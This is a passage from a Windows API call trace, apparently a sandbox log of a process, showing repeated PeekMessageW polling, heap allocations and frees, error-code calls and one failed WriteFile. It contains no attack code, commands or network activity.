wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.453] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.454] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.455] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.456] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.457] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.458] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.458] GetLastError () returned 0x6 [0257.458] SetLastError (dwErrCode=0x6) [0257.458] GetLastError () returned 0x6 [0257.458] SetLastError (dwErrCode=0x6) [0257.459] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.459] GetLastError () returned 0x6 [0257.459] GetLastError () returned 0x6 [0257.459] SetLastError (dwErrCode=0x6) [0257.459] GetLastError () returned 0x6 [0257.459] SetLastError (dwErrCode=0x6) [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dc0 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.459] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.459] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.459] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.459] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.459] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.460] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18795538305) returned 1 [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.460] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 